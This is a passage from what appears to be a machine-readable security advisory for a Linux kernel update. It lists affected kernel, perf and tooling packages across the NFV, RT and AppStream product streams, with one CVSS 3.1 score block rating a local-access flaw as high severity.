"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
